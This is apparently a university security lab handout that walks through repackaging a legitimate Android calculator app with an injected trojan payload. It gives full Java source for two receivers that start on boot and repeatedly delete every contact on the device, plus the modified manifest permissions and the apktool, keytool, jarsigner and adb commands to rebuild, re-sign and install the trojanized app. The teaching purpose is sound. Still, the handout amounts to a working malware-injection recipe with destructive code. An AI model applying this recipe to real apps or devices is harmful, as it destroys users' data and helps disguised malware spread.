Lab 6: Inject Android Malware into a Benign App

This lab was developed by Minzhe Guo

The goal of this lab is to to better understand the repackaging-based Android malware attack. In particular, it is
demonstrated how to repackage a legitimate Android app from Google Play Market into which a malicious payload
has been injected. The malicious payload mimics one of the malicious behaviors of Geinimi malware but has been
simplified so you can see the overall mechanics of the attack. The Command and Control mechanisms in Geinimi
malware are also removed.

Geinimi is listed as one of the top mobile threats by Lookout:

https://www.lookout.com/resources/top-threats

A detailed analysis of a Geinimi variant can be found at:

https://www.kindsight.net/sites/default/files/Kindsight Malware Analysis-Android-Trojan-Geinimi-final.pdf

PLEASE NOTE: the activities and materials provided in this lab are only for education purpose and it is NOT intended for piracy
or other non-legal uses.

PLEASE BE AWARE: the malicious payload will delete all the contacts on a device. Do not try this lab on your personal phone or,
if a personal Android device will be used, make a backup of the data on device.

Obtain a Legitimate Android App

• You can download any APK file from Google Play using
http://apps.evozi.com
Evozi, an Android app developer, offers a one-click online APK download app that lets you download any APK file that is listed
on the Google Play store. The downloader app can be accessed at
apps.evozi.com/apk-downloader
To do this, go to apps.evozi.com/apkdownloader, enter the web URL of any app listed on the Google Play store and click the
“Generated Download Link” button. The APK download app will fetch the APK file from the Google Play store and will host it
on its own servers from where you download the file.
• The SimpleCalculator app is sufficient for this demonstration. It is available at:
https://play.google.com/store/apps/details?id=net.tecnotopia.SimpleCalculator
If that does not work get it like this:
wget http://gauss.ececs.uc.edu/Courses/c6053/homework/net.tecnotopia.SimpleCalculator.apk
See Figure 1 for its cover.

Decompile and Repackage the App without Modification

• Contents of an APK file: an APK file is just an archive that contains the following materials for an Android App, including:
→ AndroidManifest.xml: encodes the properties and configurations of the app
→ classes.dex: compiled and assembled app code
→ META-INF (directory): information about the digital signature of the app
→ resources.arsc: contains precompiled resources
→ res (directory): resources not compiled into resources.arsc
→ lib (directory): contains the compiled code that is specific to a software layer of a processor
 Figure 1: Cover of net.tecnotopia.SimpleCalculator.apk from Evoli
• Reverse Engineering: Disassembly and Decompilation
Figure 2: SimpleCalculator files shown in
Android Studio
For any Android app, one can obtain a content structure within the
APK file of the app, similar to that shown in Figure 2, using file archival
management software such as 7-zip. At this stage, all the xml files,
resource files, and the app code are encoded or compiled. Therefore
reverse engineering is needed.
The processes of the disassembly and decompilation of an Android app
are illustrated in Figure 3. Open-source tools for the disassembly and
decompilation are the following:
→ Disassembly Tool
apktool: Acquired in Lab 5
→ Decompilation Tool
dex2jar: http://dex2jar.googlecode.com/ files/dex2jar-0.0.9.15.zip
JD-GUI: http://jd.benow.ca/
Disassemble the App
Disassembly is achieved using apktool like this:
apktool d <apk name>
If you get a java eror message you may be using /usr/bin/apktool.
If so, run apktool using the full path to apktool.
Example:
/home/franco/.android-os/apktool/apktool d <apk name>
 Figure 3: Decompilation alternatives

Output from apktool looks like this:

[franco@franco Lab.1]$ apktool d net.tecnotopia.SimpleCalculator.apk
I: Using Apktool 2.0.3 on net.tecnotopia.SimpleCalculator.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/franco/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...

Figure 4: Smali files in Android Studio
The smali file structure, as presented in Android Studio, is shown in Figure 4.
The manifest file in the decompiled output is shown in Figure 5. Note that no
permissions are requested by this app. This leaves us free to add malware fairly easily.
Repackage the App
Repackaging an Android app consists of the following steps:
Rebuild the APK file
Sign the APK file
Optimization
Rebuild the APK file using:
apktool b <app folder>
Output looks like this:
[franco@franco Lab.1]$ apktool b net.tecnotopia.SimpleCalculator
I: Using Apktool 2.0.3
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
I: Building apk file...
Rename the APK file repacked.apk
Sign the App
Official Guide:
http://developer.android.com/tools/publishing/app-signing.html
Make sure Java, keytool, and jarsigner are ready to be used
Use keytool to generate a self-signed private key as follows:
keytool -genkey -v -keystore my-release-key.store -alias \
apk-key -keyalg RSA -keysize 2048 -validity 10000
Output looks something like this:
Enter keystore password:
Re-enter new password:
What is your first and last name?
[Michael]: MG
What is the name of your organizational unit?
[UC]: CS
What is the name of your organization?
[UC]: UC
What is the name of your City or Locality?
[Cincinnati]: Cincinnati
...
Generating 2,048 bit RSA key pair and self-signed certificate
Enter key password for <apk-key>
(RETURN if same as keystore password):
[Storing my-release-key.store]
The generated key is in file my-release-key.store
<?xml version="1.0" encoding="utf-8" standalone="no"?>

<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="net.tecnotopia.SimpleCalculator">

<supports-screens android:anyDensity="true" android:largeScreens="true" android:normalScreens="true" android:smallScreens="true"/>

<application android:allowBackup="true" android:icon="@drawable/icon" android:label="@string/app name">

<activity android:label="@string/app name" android:name=".SimpleCalculatorActivity" android:theme="@android:style/Theme.NoTitleBar" style="@style/App">

<intent-filter>

<action android:name="android.intent.action.MAIN"/>

<category android:name="android.intent.category.LAUNCHER"/>

</intent-filter>

</activity>

</application>

</manifest>

Figure 5: AndroidManifest.xml of decompiled code

Use jarsigner to sign the APK file

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 \
-keystore my-release-key.store repacked.apk apk-key
Enter Passphrase for keystore:
adding: META-INF/MANIFEST.MF
adding: META-INF/APK-KEY.SF
adding: META-INF/APK-KEY.RSA
signing: res/drawable/app.xml
signing: res/drawable/blue button.xml
signing: res/drawable/darkgray button.xml
signing: res/drawable/gray button.xml
signing: res/drawable/green button.xml
signing: res/drawable/orange button.xml
signing: res/drawable/pink button.xml
signing: res/drawable/purple button.xml
signing: res/drawable/red button.xml
signing: res/drawable-hdpi/icon.png
signing: res/drawable-ldpi/icon.png
signing: res/drawable-mdpi/icon.png
signing: res/drawable-xhdpi/icon.png
signing: res/layout/main.xml
signing: res/layout-land/main.xml
signing: res/menu/main.xml
signing: AndroidManifest.xml
signing: classes.dex
signing: resources.arsc
Optimization
Zipalign:
http://developer.android.com/tools/help/zipalign.html
Zipalign optimizes the way an Android application package (APK) is packaged. Doing so enables the Android operating system
to interact with the application more efficiently, and hence has the potential to make the application and overall the whole system
much faster. Execution time is minimized for zipaligned applications, resulting is lesser amount of RAM consumption when
running the APK. Zipalign should always be used to align your .apk file before distributing it to end-users. Zipalign is located
at <home>/.android-sdk-linux/Sdk/build-tools/2X.X.X/zipalign.

[franco@franco Lab.1]$ ./zipalign -v 4 signed.rebuilt.apk aligned.signed.rebuilt.apk

Verifying alignment of aligned.signed.rebuilt.apk (4)...
50 META-INF/MANIFEST.MF (OK - compressed)
806 META-INF/APK-KEY.SF (OK - compressed)
1629 META-INF/APK-KEY.RSA (OK - compressed)
2771 res/drawable/app.xml (OK - compressed)
3115 res/drawable/blue button.xml (OK - compressed)
3683 res/drawable/darkgray button.xml (OK - compressed)
4253 res/drawable/gray button.xml (OK - compressed)
4826 res/drawable/green button.xml (OK - compressed)
5391 res/drawable/orange button.xml (OK - compressed)
5783 res/drawable/pink button.xml (OK - compressed)
6180 res/drawable/purple button.xml (OK - compressed)
6574 res/drawable/red button.xml (OK - compressed)
7136 res/drawable-hdpi/icon.png (OK)
13840 res/drawable-ldpi/icon.png (OK)
16592 res/drawable-mdpi/icon.png (OK)
20568 res/drawable-xhdpi/icon.png (OK)
29947 res/layout/main.xml (OK - compressed)
31663 res/layout-land/main.xml (OK - compressed)
33470 res/menu/main.xml (OK - compressed)
33763 AndroidManifest.xml (OK - compressed)
34582 classes.dex (OK - compressed)
142728 resources.arsc (OK)
Verification succesful

aligned.signed.repacked.apk is the APK file after optimization.

Further Optimization
Other optimizations can also be applied in order to better protect an app, for exmple:
Optimization and Obfuscation using ProGuard
http://developer.android.com/tools/help/proguard.html
Application Licensing
http://developer.android.com/google/play/licensing/index.html

Install the App

adb install aligned.signed.repacked.apk
 package edu.uc.cs.androidsecurity.trojan;

import android.app.AlarmManager;
import android.app.PendingIntent;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.util.Log;

import java.util.Calendar;

public class StartAttack extends BroadcastReceiver {

int count = 0;
Calendar cal = Calendar.getInstance();
long TIME = 1000;

@Override
public void onReceive(Context context, Intent intent) {
Log.i("StartAttack", "onReceive");
AlarmManager service = (AlarmManager)context.getSystemService(Context.ALARM SERVICE);
Intent i = new Intent(context, RunTrojan.class);
//i.setAction("android.trojan.action.BC ACTION");
PendingIntent pending = PendingIntent.getBroadcast(context, 0, i, PendingIntent.FLAG CANCEL CURRENT);
service.setInexactRepeating(AlarmManager.RTC WAKEUP, cal.getTimeInMillis(), TIME, pending);
Log.i("StartAttack", count++ +" times");
}
}

Figure 6: StartAttack class source code

Repackage with Malicious Payload

Repackaging a legitimate Android app for malicious purpose typically involves modifications in 1) the AndroidManifest.xml and
2) the app code. There are two levels of app code where malicious code can be injected: at the java source code level or at the
smali code level. Since the decompilation of an app to its java source project is more likely to generate errors and is not always
possible, in this lab we choose to place the malicious code at the smali level. Nevertheless, both the java source and the smali
code of the malicious payload are provided so one can practice decompiling the apk to an eclipse project and modifying the app
at the java source level.
package edu.uc.cs.androidsecurity.trojan;

import android.content.BroadcastReceiver;
import android.content.ContentResolver;
import android.content.Context;
import android.content.Intent;
import android.database.Cursor;
import android.net.Uri;
import android.provider.ContactsContract;
import android.util.Log;

public class RunTrojan extends BroadcastReceiver {

@Override
public void onReceive(Context context, Intent intent) {
Log.i("LOG", "deleteContacts");
ContentResolver contentResolver = context.getContentResolver();
Cursor cursor = contentResolver.query(ContactsContract.Contacts.CONTENT URI, null, null, null, null);
while (cursor.moveToNext()) {
String lookupKey = cursor.getString(cursor.getColumnIndex(ContactsContract.Contacts.LOOKUP KEY));
Uri uri = Uri.withAppendedPath(ContactsContract.Contacts.CONTENT LOOKUP URI,lookupKey);
Log.i("LOG", uri.toString());
contentResolver.delete(uri, null, null);
}
}
}

Figure 7: RunTrojan class source code

• Malicious Code
The code representing malicious code in this lab is much simpler than malicious code that is typically found in real-world Android
malware. The code consists of two Android BroadcastReceiver classes:
→ Class StartAttack extends BroadcastReceiver listens for the BOOT COMPLETED event and uses the AlarmManager (devel-
oper.android.com/reference/android/app/AlarmManager.html) to schedule the periodic invocation of a method in the
RunTrojan class. Source code is shown in Figure 6. Note that a new Intent object is created around the RunTrojan
class. The idea is to send a signal that is caught by the onReceive method of the RunTrojan class. The commented line
needs to be uncommented to do this. More on this later.
→ Class RunTrojan extends BroadcastReceiver. Its onReceive method will be invoked by the systems AlarmManager to delete
all contacts on the device in the while loop. Source code is shown in Figure 7.
 <?xml version="1.0" encoding="utf-8" standalone="no"?>

<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="net.tecnotopia.SimpleCalculator" platformBuildVersionCode="21" platformBuildVersionName="5.0-1521886">

<uses-permission android:name="android.permission.READ CONTACTS"/>

<uses-permission android:name="android.permission.WRITE CONTACTS"/>

<uses-permission android:name="android.permission.RECEIVE BOOT COMPLETED"/>

<application android:allowBackup="true" android:icon="@drawable/icon" android:label="@string/app name" android:theme="@style/App">

<activity android:label="@string/app name" android:name="net.tecnotopia.SimpleCalculator.MainActivity">

<intent-filter>

<action android:name="android.intent.action.MAIN"/>

<category android:name="android.intent.category.LAUNCHER"/>

</intent-filter>

</activity>

<receiver android:name="edu.uc.cs.androidsecurity.trojan.RunTrojan"/>

<intent-filter>

<action android:name="android.trojan.action.BC ACTION"/>

</intent-filter>

<receiver android:name="edu.uc.cs.androidsecurity.trojan.StartAttack">

<intent-filter>

<action android:name="android.intent.action.BOOT COMPLETED"/>

</intent-filter>

</receiver>

<activity android:label="@string/menu settings" android:name="net.tecnotopia.SimpleCalculator.SettingsActivity"/>

</application>

</manifest>

Figure 8: The modified AndroidManifest.xml file. Additions to the original file are shown in red

• Modify the App

Make the APK package containing these two classes.
Compile the classes StartAttack and RunTrojan to smali code
Create a new android project (e.g. edu.uc.cs.androidsecurity.trojan)
Create new classes with names as above and with superclass
android.content.BroadcastReceiver
Copy the above into those classes
Compile (Build) then export as an APK package - likely lands in app/build/outputs/apk as app-debug.apk
Use the apktool to disassemble the app-debug.apk package. This results in a directory, possibly named app-debug/smali
Use the apktool to disassemble the SimpleCalculator app (as described earlier) and name the generated folder: malCalculator
Inject the malicious code. Since the malicious code has no interactions with the legitimate app code, we can directly add the smali
code in app-debug/smali/androidsecurity to the folder ./malCalculator/smali/. Before injection, the malCalculator/smali
directory contains subdirectories net and android. After injection that directory contains net, android and androidsecurity
subdirectories (please note - the important subdirectory app-debug/smali may be named something other than androidsecurity
- no problem, dump it into the malCalculator/smali directory, as is).
 Figure 9: The Modified SimpleCalculator App

• Modify the AnroidManifest.xml file

Four things need to be added, two intent filters and permission to read/write contacts and to receive BOOT COMPLETED. The
BOOT Completed action needs to be added to activate the onReceive method of the StartAttack class and the BC ACTION action
needs to be added to activate the onReceive method of the RunTrojan class. As stated before, the commented line in RunTrojan
needs to be uncommented before building the package for this to work. The modified AndroidManifest.xml file is shown in
Figure 8.
• Pack the malCalculator
After the modification, follow steps in the ’Repackage the App’ Section to repackage the app to an APK file. Name it
malCalculator.apk.
• Run the malCalculator
1) Start an emulator and use “adb install” to install malCalculator.apk
2) The screenshots of Figure 9 show that the malCalculator appears and behaves the same as the legitimate SimpleCalculator.
3) Since the malicious code will be invoked by the BOOT COMPLETED event, we need to restart the phone. Do not erase the user
data during the restart.
4) After rebooting, StartAttack is invoked by the BOOT COMPLETED event and has scheduled the periodic invocation of the
RunTrojan for erasing contacts. For example, we added two contacts (left screenshot in Figure 10); and after several
minutes, the two contacts were deleted (right screenshot in Figure 10).
Figure 10: The contact information, before and after